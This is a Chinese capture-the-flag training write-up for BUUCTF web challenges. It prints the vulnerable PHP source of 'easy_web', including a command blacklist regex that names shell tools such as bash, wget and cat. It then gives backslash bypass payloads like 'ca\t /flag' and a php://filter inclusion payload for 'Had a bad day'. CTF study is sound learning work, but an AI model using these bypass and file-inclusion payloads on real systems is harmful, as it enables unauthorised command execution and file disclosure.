[BUUCTF] 集训第一天

[网鼎杯 2020 朱雀组]phpweb
1
[安洵杯 2019]easy_web
1
打开注意到img值

1. 选正确且最强的解码工具解码

两次base64解码+hex转str

2. hackbar解码
   
   有获取文件内容功能,尝试编码获取index. php

最强base64工具获取图片base解密信息,拿到index.php关键源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

关键img:

$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";

输出信息,与拿flag无关

关键cmd

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

1. \命令执行绕过
   \t 自动转义,绕过正则(我是这么理解的)

l\s
l\s%20/
ca\t %20/flag
sor\t%20/flag* 

2. md5碰撞

 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

这里很特殊的是要满足两次url编码,且md5后是相等的

post数据url解码一次

这里卡了很久，都是因为a和b的值

[BSidesCF 2020]Had a bad day
1

发现是文件包含，什么姿势都不行。尝试/var/www/html/index.php
发现会自动添加php文件后缀
于是把.php去掉，这个递归差点没把电脑跑x
换个姿势

怎么这里当时没注意

正确姿势

?category=php://filter/convert.base64-encode/resource=index

拿到源码

<?php
	$file = $_GET['category'];

	if(isset($file))
	{
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
			include ($file . '.php');
		}
		else{
			echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

 //必须含有woofers或meowers或index字符串
 //参数后拼接.php

Sorry, we currently only support woofers and meowers.
既然只支持这两个字符，又是文件包含，试一下路径名称
/woofers/…/…/flag

payload:

?category=php://filter/convert.base64-encode/woofers/resource=flag